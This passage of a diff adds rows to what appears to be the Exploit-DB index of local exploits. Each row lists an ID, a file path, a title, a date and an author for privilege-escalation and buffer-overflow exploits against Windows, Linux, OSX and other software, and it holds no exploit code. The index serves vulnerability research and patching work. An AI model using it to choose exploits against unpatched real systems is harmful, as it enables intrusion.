+35590,exploits/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 - Local Privilege Escalation",2014-12-23,LiquidWorm,local,windows, +35595,exploits/linux/local/35595.txt,"GParted 0.14.1 - OS Command Execution",2014-12-23,"SEC Consult",local,linux, +35661,exploits/windows/local/35661.txt,"Microsoft Windows 8.1 (x86/x64) - 'ahcache.sys' NtApphelpCacheControl Privilege Escalation",2015-01-01,"Google Security Research",local,windows, +35671,exploits/windows/local/35671.rb,"i-FTP Schedule - Local Buffer Overflow (Metasploit)",2015-01-01,Metasploit,local,windows, +35681,exploits/linux/local/35681.txt,"OProfile 0.9.6 - 'opcontrol' Utility 'set_event()' Local Privilege Escalation",2011-04-29,"Stephane Chauveau",local,linux, +35712,exploits/windows/local/35712.rb,"BulletProof FTP Client - BPS Buffer Overflow (Metasploit)",2015-01-06,Metasploit,local,windows, +35711,exploits/android/local/35711.c,"Nexus 5 Android 5.0 - Local Privilege Escalation",2015-01-06,retme,local,android, +35732,exploits/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,local,multiple, +35741,exploits/windows/local/35741.pl,"Palringo 2.8.1 - Local Stack Buffer Overflow (PoC)",2015-01-10,Mr.ALmfL9,local,windows, +35742,exploits/osx/local/35742.c,"Apple Mac OSX 10.9.x - sysmond XPC Privilege Escalation",2015-01-10,"Google Security Research",local,osx, +35746,exploits/linux/local/35746.sh,"RedStar 3.0 Desktop - Enable sudo Privilege Escalation",2015-01-11,"prdelka & ‏sfan55",local,linux, +35748,exploits/linux/local/35748.txt,"RedStar 2.0 Desktop - 'World-writeable rc.sysinit' Local Privilege Escalation",2015-01-11,prdelka,local,linux, +35749,exploits/linux/local/35749.txt,"RedStar 3.0 Desktop - 'Software Manager swmng.app' Local Privilege Escalation",2015-01-11,RichardG,local,linux, +35811,exploits/windows/local/35811.txt,"Microsoft Windows < 8.1 (x86/x64) - User Profile Service Privilege Escalation (MS15-003)",2015-01-18,"Google Security Research",local,windows, +35812,exploits/windows/local/35812.py,"T-Mobile Internet Manager - Local Buffer Overflow (SEH)",2015-01-18,metacom,local,windows, +35813,exploits/windows/local/35813.py,"Congstar Internet Manager - Local Buffer Overflow (SEH)",2015-01-18,metacom,local,windows, +35821,exploits/windows/local/35821.txt,"Sim Editor 6.6 - Stack Based Buffer Overflow",2015-01-16,"Osanda Malith",local,windows, +35993,exploits/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",local,windows, +35994,exploits/windows/local/35994.c,"BullGuard (Multiple Products) - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",local,windows, +35847,exploits/osx/local/35847.c,"Apple Mac OSX networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",local,osx, +35848,exploits/osx/local/35848.c,"Apple Mac OSX 10.9.5 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",local,osx, +35850,exploits/windows/local/35850.bat,"Microsoft Windows XP - 'tskill' Local Privilege Escalation",2011-06-13,"Todor Donev",local,windows, +35992,exploits/windows/local/35992.c,"K7 Computing (Multiple Products) - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",local,windows, +35901,exploits/windows/local/35901.txt,"VideoLAN VLC Media Player 2.1.5 - DEP Access Violation",2015-01-26,"Veysel HATAS",local,windows, +35902,exploits/windows/local/35902.txt,"VideoLAN VLC Media Player 2.1.5 - Write Access Violation",2015-01-26,"Veysel HATAS",local,windows, +35905,exploits/windows/local/35905.c,"Comodo Backup 4.4.0.0 - Null Pointer Dereference Privilege Escalation",2015-01-26,"Parvez Anwar",local,windows, +35983,exploits/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit)",2015-02-03,Metasploit,local,windows, +35934,exploits/osx/local/35934.txt,"Apple Mac OSX < 10.10.x - GateKeeper Bypass",2015-01-29,"Amplia Security Research",local,osx, +35936,exploits/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,local,windows, +35953,exploits/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",local,windows, +35962,exploits/windows/local/35962.c,"Trend Micro 8.0.1133 (Multiple Products) - Local Privilege Escalation",2015-01-31,"Parvez Anwar",local,windows, +35964,exploits/windows/local/35964.c,"Symantec Altiris Agent 6.9 (Build 648) - Local Privilege Escalation",2015-02-01,"Parvez Anwar",local,windows, +36052,exploits/windows/local/36052.c,"SoftSphere DefenseWall FW/IPS 3.24 - Local Privilege Escalation",2015-02-11,"Parvez Anwar",local,windows, +36053,exploits/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (1)",2015-02-11,"dogo h@ck",local,windows, +36062,exploits/windows/local/36062.txt,"Realtek 11n Wireless LAN utility - Local Privilege Escalation",2015-02-13,"Humberto Cabrera",local,windows, +36104,exploits/windows/local/36104.py,"Publish-It 3.6d - Local Buffer Overflow (SEH)",2015-02-18,"Andrew Smith",local,windows, +36143,exploits/osx/local/36143.txt,"Apple Mac OSX (Lion) - Directory Services Security Bypass",2011-09-19,"Defence in Depth",local,osx, +36188,exploits/windows/local/36188.txt,"Electronic Arts Origin Client 9.5.5 - Multiple Privilege Escalation Vulnerabilities",2015-02-26,LiquidWorm,local,windows, +36189,exploits/windows/local/36189.txt,"Ubisoft Uplay 5.0 - Insecure File Permissions Privilege Escalation",2015-02-26,LiquidWorm,local,windows, +36207,exploits/windows/local/36207.py,"Microsoft Word 2007 - RTF Object Confusion (ASLR + DEP Bypass)",2015-02-28,R-73eN,local,windows, +36229,exploits/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",local,linux, +36257,exploits/linux/local/36257.txt,"Trend Micro IWSS 3.1 - Local Privilege Escalation",2011-10-26,"Buguroo Offensive Security",local,linux, +36294,exploits/linux/local/36294.c,"Linux Kernel 3.0.4 - '/proc/interrupts' Password Length Local Information Disclosure",2011-11-07,"Vasiliy Kulikov",local,linux, +36296,exploits/bsd/local/36296.pl,"OpenPAM - 'pam_start()' Local Privilege Escalation",2011-11-09,IKCE,local,bsd, +36310,exploits/lin_x86-64/local/36310.txt,"Linux Kernel (x86-64) - Rowhammer Privilege Escalation (PoC)",2015-03-09,"Google Security Research",local,lin_x86-64, +36311,exploits/lin_x86-64/local/36311.txt,"Rowhammer - NaCl Sandbox Escape (PoC)",2015-03-09,"Google Security Research",local,lin_x86-64, +36327,exploits/windows/local/36327.txt,"Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation (MS10-073)",2011-11-22,instruder,local,windows, +36390,exploits/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Privilege Escalation",2015-03-16,LiquidWorm,local,windows, +36417,exploits/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Local Privilege Escalation",2015-03-17,LiquidWorm,local,windows, +36424,exploits/windows/local/36424.txt,"Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Privilege Escalation",2015-03-19,"Google Security Research",local,windows, +36430,exploits/linux/local/36430.sh,"HP Application Lifestyle Management 11 - 'GetInstalledPackages' Local Privilege Escalation",2011-12-08,anonymous,local,linux, +36437,exploits/windows/local/36437.rb,"Publish-It - '.PUI' Local Buffer Overflow (SEH) (Metasploit)",2015-03-19,Metasploit,local,windows, +36465,exploits/windows/local/36465.py,"Free MP3 CD Ripper 2.6 - '.wav' Local Buffer Overflow",2015-03-22,"TUNISIAN CYBER",local,windows, +36476,exploits/windows/local/36476.txt,"Kaspersky Internet Security/Anti-Virus - '.cfg' File Memory Corruption",2011-12-21,"Vulnerability Research Laboratory",local,windows, +36501,exploits/windows/local/36501.py,"Mini-stream Ripper 2.7.7.100 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",local,windows, +36502,exploits/windows/local/36502.py,"RM Downloader 2.7.5.400 - Local Buffer Overflow",2015-03-26,"TUNISIAN CYBER",local,windows, +36533,exploits/windows/local/36533.py,"IDM 6.20 - Local Buffer Overflow",2015-03-28,"TUNISIAN CYBER",local,windows, +36747,exploits/linux/local/36747.c,"Abrt (Fedora 21) - Race Condition",2015-04-14,"Tavis Ormandy",local,linux, +36564,exploits/linux/local/36564.txt,"Fedora 21 setroubleshootd 3.2.22 - Local Privilege Escalation (PoC)",2015-03-30,"Sebastian Krahmer",local,linux, +36571,exploits/linux/local/36571.sh,"OverlayFS inode Security Checks - 'inode.c' Local Security Bypass",2012-01-17,"Gary Poster",local,linux, +36739,exploits/osx/local/36739.m,"Apple Mac OSX < 10.9/10 - Local Privilege Escalation",2015-04-13,mu-b,local,osx, +36692,exploits/osx/local/36692.py,"Apple Mac OSX < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Local Privilege Escalation",2015-04-09,"Emil Kvarnhammar",local,osx, +36746,exploits/linux/local/36746.c,"Apport/Abrt (Ubuntu / Fedora) - Local Privilege Escalation",2015-04-14,"Tavis Ormandy",local,linux, +36745,exploits/osx/local/36745.rb,"Apple Mac OSX - 'Rootpipe' Local Privilege Escalation (Metasploit)",2015-04-13,Metasploit,local,osx, +36782,exploits/linux/local/36782.sh,"Apport 2.14.1 (Ubuntu 14.04.2) - Local Privilege Escalation",2015-04-17,"Ricardo F. Teixeira",local,linux, +36813,exploits/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",local,hardware, +36819,exploits/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' Local Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",local,windows, +36820,exploits/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",local,linux, +36822,exploits/windows/local/36822.pl,"Quick Search 1.1.0.189 - search textbox Buffer Overflow (SEH Unicode) (Egghunter)",2015-04-23,"Tomislav Paskalev",local,windows, +36826,exploits/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 - '.wav' File Buffer Overflow (SEH)",2015-04-23,ThreatActor,local,windows, +36827,exploits/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 (Windows 7) - '.wav' File Buffer Overflow (SEH) (DEP Bypass)",2015-04-24,naxxo,local,windows, +36837,exploits/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",local,windows, +37065,exploits/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation",2015-05-20,"Jeremy Brown",local,windows, +36855,exploits/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation",2015-04-29,"Ben Sheppard",local,linux, +36859,exploits/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",local,windows, +36887,exploits/linux/local/36887.py,"GNOME NetworkManager 0.x - Local Arbitrary File Access",2012-02-29,Ludwig,local,linux, +36909,exploits/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (Metasploit)",2015-05-04,"TUNISIAN CYBER",local,windows, +36920,exploits/windows/local/36920.py,"Mediacoder 0.8.34.5716 - '.m3u' Local Buffer Overflow (SEH)",2015-05-06,evil_comrade,local,windows, +36966,exploits/linux/local/36966.txt,"LightDM 1.0.6 - Arbitrary File Deletion",2012-03-13,"Ryan Lortie",local,linux, +36928,exploits/windows/local/36928.py,"Macro Toolworks 7.5 - Local Buffer Overflow",2012-03-08,"Julien Ahrens",local,windows, +36980,exploits/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - Local Buffer Overflow",2015-05-11,evil_comrade,local,windows, +36981,exploits/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - Local Buffer Overflow",2015-05-11,evil_comrade,local,windows, +36982,exploits/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - Local Buffer Overflow",2015-05-11,evil_comrade,local,windows, +37049,exploits/windows/local/37049.txt,"Microsoft Windows - Local Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,local,windows, +37052,exploits/windows/local/37052.c,"Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (PoC) (MS15-052)",2015-05-18,4B5F5F4B,local,windows, +37056,exploits/windows/local/37056.py,"BulletProof FTP Client 2010 - Local Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",local,windows, +37064,exploits/win_x86-64/local/37064.py,"Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Local Privilege Escalation (MS14-058)",2015-05-19,ryujin,local,win_x86-64, +37088,exploits/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation",2015-05-23,rebel,local,linux, +37089,exploits/linux/local/37089.txt,"Fuse 2.9.3-15 - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",local,linux, +37098,exploits/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",local,windows, +37197,exploits/windows/local/37197.py,"Jildi FTP Client 1.5.6 - Local Buffer Overflow (SEH)",2015-06-04,"Zahid Adeel",local,windows, +37167,exploits/linux/local/37167.c,"PonyOS 3.0 - VFS Permissions",2015-06-01,"Hacker Fantastic",local,linux, +37168,exploits/linux/local/37168.txt,"PonyOS 3.0 - ELF Loader Privilege Escalation",2015-06-01,"Hacker Fantastic",local,linux, +37183,exploits/linux/local/37183.c,"PonyOS 3.0 - TTY 'ioctl()' Local Kernel",2015-06-02,"Hacker Fantastic",local,linux, +37211,exploits/windows/local/37211.html,"1 Click Audio Converter 2.3.6 - Activex Local Buffer Overflow",2015-06-05,metacom,local,windows, +37212,exploits/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,local,windows, +37265,exploits/linux/local/37265.txt,"OSSEC 2.7 < 2.8.1 - 'diff' Local Privilege Escalation",2015-06-11,"Andrew Widdersheim",local,linux, +37292,exploits/linux/local/37292.c,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation",2015-06-16,rebel,local,linux, +37293,exploits/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,local,linux, +37344,exploits/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",local,windows, +37367,exploits/windows/local/37367.rb,"Microsoft Windows - ClientCopyImage Win32k (MS15-051) (Metasploit)",2015-06-24,Metasploit,local,windows, +37535,exploits/windows/local/37535.txt,"Blueberry Express 5.9.0.3678 - Local Buffer Overflow (SEH)",2015-07-08,Vulnerability-Lab,local,windows, +40709,exploits/aix/local/40709.sh,"IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Local Privilege Escalation",2016-11-04,"Hector X. Monsegur",local,aix, +37543,exploits/linux/local/37543.c,"Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure",2012-07-26,"Jay Fenlason",local,linux, +37631,exploits/linux/local/37631.c,"GNU glibc - Multiple Local Stack Buffer Overflow Vulnerabilities",2012-08-13,"Joseph S. Myer",local,linux, +37657,exploits/windows/local/37657.txt,"Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)",2015-07-20,"Eduardo Braun Prado",local,windows, +37670,exploits/osx/local/37670.sh,"Apple Mac OSX 10.10 - 'DYLD_PRINT_TO_FILE' Local Privilege Escalation",2015-07-22,"Stefan Esser",local,osx, +37699,exploits/windows/local/37699.py,"Foxit Reader - '.png' Conversion Parsing tEXt Chunk Arbitrary Code Execution",2015-07-27,"Sascha Schirra",local,windows, +37737,exploits/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,local,windows, +37825,exploits/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - 'XNU' Local Privilege Escalation",2015-08-18,kpwn,local,osx, +37710,exploits/linux/local/37710.txt,"Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorized Privilege Escalation",2015-07-28,"daniel svartman",local,linux, +37716,exploits/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",local,windows, +37722,exploits/lin_x86-64/local/37722.c,"Linux espfix64 - Nested NMIs Interrupting Privilege Escalation",2015-08-05,"Andrew Lutomirski",local,lin_x86-64, +37724,exploits/lin_x86/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation (PoC)",2015-08-07,"Christopher Domas",local,lin_x86, +37730,exploits/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Local Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",local,windows, +37732,exploits/win_x86/local/37732.c,"Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",local,win_x86, +38106,exploits/aix/local/38106.txt,"IBM AIX High Availability Cluster Multiprocessing (HACMP) - Local Privilege Escalation",2015-09-08,"Kristian Erik Hermansen",local,aix, +38107,exploits/windows/local/38107.c,"Cisco Sourcefire User Agent 2.2 - Insecure File Permissions",2015-09-08,"Glafkos Charalambous",local,windows, +37755,exploits/windows/local/37755.c,"Microsoft Windows Server 2003 SP2 - TCP/IP IOCTL Privilege Escalation (MS14-070)",2015-08-12,"Tomislav Paskalev",local,windows, +37760,exploits/windows/local/37760.rb,"PDF Shaper 3.5 - Local Buffer Overflow (Metasploit)",2015-08-12,metacom,local,windows, +37768,exploits/windows/local/37768.txt,"Microsoft Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076)",2015-08-13,monoxgas,local,windows, +37771,exploits/windows/local/37771.py,"Microsoft HTML Help Compiler 4.74.8702.0 - Local Overflow (SEH)",2015-08-15,St0rn,local,windows, +37772,exploits/multiple/local/37772.js,"Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy",2015-08-15,"Tantaryu MING",local,multiple, +37780,exploits/windows/local/37780.c,"ThinPrint - 'tpfc.dll' Insecure Library Loading Arbitrary Code Execution",2012-09-04,"Moshe Zioni",local,windows, +37799,exploits/windows/local/37799.py,"MASM321 11 Quick Editor '.qeditor' 4.0g - '.qse' File Buffer Overflow (SEH) (ASLR + SafeSEH Bypass)",2015-08-17,St0rn,local,windows, +37813,exploits/windows/local/37813.rb,"VideoCharge Studio - Local Buffer Overflow (SEH) (Metasploit)",2015-08-18,Metasploit,local,windows, +37937,exploits/linux/local/37937.c,"Linux Kernel 3.2.x - 'uname()' System Call Local Information Disclosure",2012-10-09,"Brad Spengler",local,linux, +37890,exploits/windows/local/37890.py,"Multiple ChiefPDF Software 2.0 - Local Buffer Overflow",2015-08-20,metacom,local,windows, +37898,exploits/linux/local/37898.py,"Reaver Pro - Local Privilege Escalation",2012-09-30,infodox,local,linux, +37925,exploits/windows/local/37925.txt,"Mozilla - Maintenance Service Log File Overwrite Privilege Escalation",2015-08-21,"Google Security Research",local,windows, +37964,exploits/windows/local/37964.c,"Broadcom WIDCOMM Bluetooth - 'btkrnl.sys' Driver Privilege Escalation",2012-10-18,"Nikita Tarakanov",local,windows, +37975,exploits/linux/local/37975.py,"ZSNES 1.51 - Local Buffer Overflow",2015-08-26,"Juan Sacco",local,linux, +37987,exploits/linux/local/37987.py,"FENIX 0.92 - Local Buffer Overflow",2015-08-27,"Juan Sacco",local,linux, +37988,exploits/linux/local/37988.py,"BSIGN 0.4.5 - Local Buffer Overflow",2015-08-27,"Juan Sacco",local,linux, +38035,exploits/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - 'convert' Local Buffer Overflow",2015-08-31,"Robbie Corley",local,windows, +38036,exploits/osx/local/38036.rb,"Apple Mac OSX Entitlements - 'Rootpipe' Local Privilege Escalation (Metasploit)",2015-08-31,Metasploit,local,osx, +38087,exploits/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Local Buffer Overflow",2015-09-06,"Robbie Corley",local,windows, +38089,exploits/osx/local/38089.txt,"Disconnect.me Mac OSX Client 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",local,osx, +38136,exploits/osx/local/38136.txt,"Apple Mac OSX Install.Framework - SUID Root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",local,osx, +38137,exploits/osx/local/38137.txt,"Apple Mac OSX Install.Framework - Arbitrary mkdir / unlink and chown to Admin Group",2015-09-10,"Google Security Research",local,osx, +38095,exploits/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - Local Buffer Overflow (SEH/ToLower() Bypass)",2015-09-07,"Robbie Corley",local,windows, +38138,exploits/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",local,osx, +38147,exploits/windows/local/38147.pl,"Logitech Webcam Software 1.1 - 'eReg.exe' Local Buffer Overflow (SEH Unicode)",2015-09-11,"Robbie Corley",local,windows, +40975,exploits/android/local/40975.rb,"Google Android - get_user/put_user (Metasploit)",2016-12-29,Metasploit,local,android, +38185,exploits/windows/local/38185.txt,"Total Commander 8.52 - Overwrite Buffer Overflow (SEH)",2015-09-15,Un_N0n,local,windows, +38198,exploits/windows/local/38198.txt,"Microsoft Windows 10 (Build 10130) - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",local,windows, +38199,exploits/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",local,windows, +38200,exploits/windows/local/38200.txt,"Microsoft Windows Task Scheduler - 'DeleteExpiredTaskAfter' File Deletion Privilege Escalation",2015-09-15,"Google Security Research",local,windows, +38201,exploits/windows/local/38201.txt,"Microsoft Windows - CreateObjectTask TileUserBroker Privilege Escalation",2015-09-15,"Google Security Research",local,windows, +38202,exploits/windows/local/38202.txt,"Microsoft Windows - CreateObjectTask SettingsSyncDiagnostics Privilege Escalation",2015-09-15,"Google Security Research",local,windows, +38218,exploits/windows/local/38218.py,"IKEView.exe R60 - '.elg' Local (SEH)",2015-09-17,cor3sm4sh3r,local,windows, +38219,exploits/windows/local/38219.py,"ZTE PC UI USB Modem Software - Local Buffer Overflow",2015-09-17,R-73eN,local,windows, +38220,exploits/windows/local/38220.py,"IKEView R60 - Local Buffer Overflow (SEH)",2015-09-17,VIKRAMADITYA,local,windows, +38222,exploits/win_x86-64/local/38222.rb,"Microsoft Windows - Font Driver Buffer Overflow (MS15-078) (Metasploit)",2015-09-17,Metasploit,local,win_x86-64, +38232,exploits/linux/local/38232.txt,"GNU Coreutils 'sort' Text Utility - Local Buffer Overflow",2013-01-21,anonymous,local,linux, +38243,exploits/windows/local/38243.py,"Total Commander 8.52 (Windows 10) - Local Buffer Overflow",2015-09-20,VIKRAMADITYA,local,windows, +38244,exploits/windows/local/38244.py,"Total Commander 8.52 - Local Buffer Overflow",2015-09-20,VIKRAMADITYA,local,windows, +38287,exploits/windows/local/38287.txt,"Kaspersky AntiVirus - ThinApp Parser Stack Buffer Overflow",2015-09-22,"Google Security Research",local,windows, +38289,exploits/windows/local/38289.txt,"Cisco AnyConnect Secure Mobility Client 3.1.08009 - Local Privilege Escalation",2015-09-22,"Google Security Research",local,windows, +38298,exploits/linux/local/38298.txt,"xNBD - '/tmp/xnbd.log' Insecure Temporary File Handling",2013-02-06,"Sebastian Pipping",local,linux, +38299,exploits/windows/local/38299.txt,"Symantec Encryption Desktop 10 - Local Buffer Overflow / Privilege Escalation",2012-02-25,"Nikita Tarakanov",local,windows, +38303,exploits/osx/local/38303.c,"Cisco AnyConnect 3.1.08009 - Local Privilege Escalation (via DMG Install Script)",2015-09-23,"Yorick Koster",local,osx, +38447,exploits/multiple/local/38447.pl,"libsndfile 1.0.25 - Local Heap Overflow",2015-10-13,"Marco Romano",local,multiple, +38319,exploits/windows/local/38319.py,"WinRar 5.21 - SFX OLE Command Execution",2015-09-25,R-73eN,local,windows, +38347,exploits/bsd/local/38347.rb,"Watchguard XCS - FixCorruptMail Privilege Escalation (Metasploit)",2015-09-28,Metasploit,local,bsd,443 +38349,exploits/windows/local/38349.py,"IconLover 5.42 - Local Buffer Overflow",2015-09-29,cor3sm4sh3r,local,windows, +38353,exploits/linux/local/38353.txt,"Apport 2.19 (Ubuntu 15.04) - Local Privilege Escalation",2015-09-29,halfdog,local,linux, +38357,exploits/linux/local/38357.c,"rpi-update - Insecure Temporary File Handling / Security Bypass",2013-02-28,Technion,local,linux, +38360,exploits/osx/local/38360.txt,"Dropbox < 3.3.x - OSX FinderLoadBundle Privilege Escalation",2015-09-30,cenobyte,local,osx, +38362,exploits/windows/local/38362.py,"MakeSFX.exe 1.44 - Local Stack Buffer Overflow",2015-09-30,hyp3rlinx,local,windows, +38371,exploits/osx/local/38371.py,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation",2015-10-01,rebel,local,osx, +38381,exploits/windows/local/38381.py,"WinRar < 5.30 Beta 4 - Settings Import Command Execution",2015-10-02,R-73eN,local,windows, +38382,exploits/windows/local/38382.py,"ASX to MP3 Converter 1.82.50 - '.asx' Local Stack Overflow",2015-10-02,ex_ptr,local,windows, +38390,exploits/linux/local/38390.c,"Linux Kernel 3.0 < 3.3.5 - 'CLONE_NEWUSER|CLONE_FS' Local Privilege Escalation",2013-03-13,"Sebastian Krahmer",local,linux, +38403,exploits/win_x86/local/38403.txt,"TrueCrypt 7 / VeraCrypt 1.13 - Drive Letter Symbolic Link Creation Privilege Escalation",2015-10-05,"Google Security Research",local,win_x86, +38423,exploits/windows/local/38423.py,"VeryPDF Image2PDF Converter - Local Buffer Overflow (SEH)",2015-10-08,"Robbie Corley",local,windows, +38456,exploits/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - Local Buffer Overflow (SEH)",2015-10-14,ArminCyber,local,windows, +38452,exploits/windows/local/38452.txt,"CDex Genre 1.79 - Local Stack Buffer Overflow",2015-10-13,Un_N0n,local,windows, +38467,exploits/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,local,windows, +38472,exploits/windows/local/38472.py,"Blat 2.7.6 SMTP / NNTP Mailer - Local Buffer Overflow",2015-10-15,hyp3rlinx,local,windows, +38473,exploits/linux/local/38473.py,"Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass",2015-10-15,soyer,local,linux, +38474,exploits/windows/local/38474.txt,"Microsoft Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",local,windows, +38486,exploits/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - Local Stack Overflow (SEH)",2015-10-18,"yokoacc_ nudragn_ rungga_reksya",local,windows, +38504,exploits/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,local,windows, +38532,exploits/windows/local/38532.py,"Alreader 2.5 .fb2 - Based Stack Overflow (SEH) (ASLR + DEP Bypass)",2015-10-25,g00dv1n,local,windows, +38533,exploits/windows/local/38533.c,"Microsoft Windows 10 - 'pcap' Driver Privilege Escalation",2015-10-26,Rootkitsmm,local,windows, +38540,exploits/osx/local/38540.rb,"Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Local Privilege Escalation (Metasploit)",2015-10-27,Metasploit,local,osx, +38559,exploits/linux/local/38559.txt,"Linux Kernel 3.3.5 - 'b43' Wireless Driver Privilege Escalation",2013-06-07,"Kees Cook",local,linux, +38576,exploits/aix/local/38576.sh,"AIX 7.1 - 'lquerylv' Local Privilege Escalation",2015-10-30,"S2 Crew",local,aix, +38600,exploits/windows/local/38600.py,"Sam Spade 1.14 - Crawl Website Buffer Overflow",2015-11-02,MandawCoder,local,windows, +38601,exploits/windows/local/38601.py,"Sam Spade 1.14 - Scan Addresses Buffer Overflow",2015-11-02,VIKRAMADITYA,local,windows, +38603,exploits/windows/local/38603.py,"TCPing 2.1.0 - Local Buffer Overflow",2015-11-02,hyp3rlinx,local,windows, +38609,exploits/windows/local/38609.py,"Gold MP4 Player - '.swf' Local Overflow",2015-11-03,"Vivek Mahajan",local,windows, +38631,exploits/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",local,windows, +38668,exploits/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption - Information Disclosure",2013-07-09,"Brad Antoniewicz",local,windows, +38672,exploits/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",local,windows, +38700,exploits/windows/local/38700.pl,"TECO SG2 LAD Client 3.51 - '.gen' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,local,windows, +38704,exploits/windows/local/38704.pl,"TECO JN5 L510-DriveLink 1.482 - '.lf5' Overwrite Buffer Overflow (SEH)",2015-11-16,LiquidWorm,local,windows, +38751,exploits/windows/local/38751.txt,"IBM i Access 7.1 - Local Buffer Overflow / Code Execution",2015-11-18,hyp3rlinx,local,windows, +38752,exploits/windows/local/38752.c,"Watchguard Server Center - Local Privilege Escalation",2013-09-08,"Julien 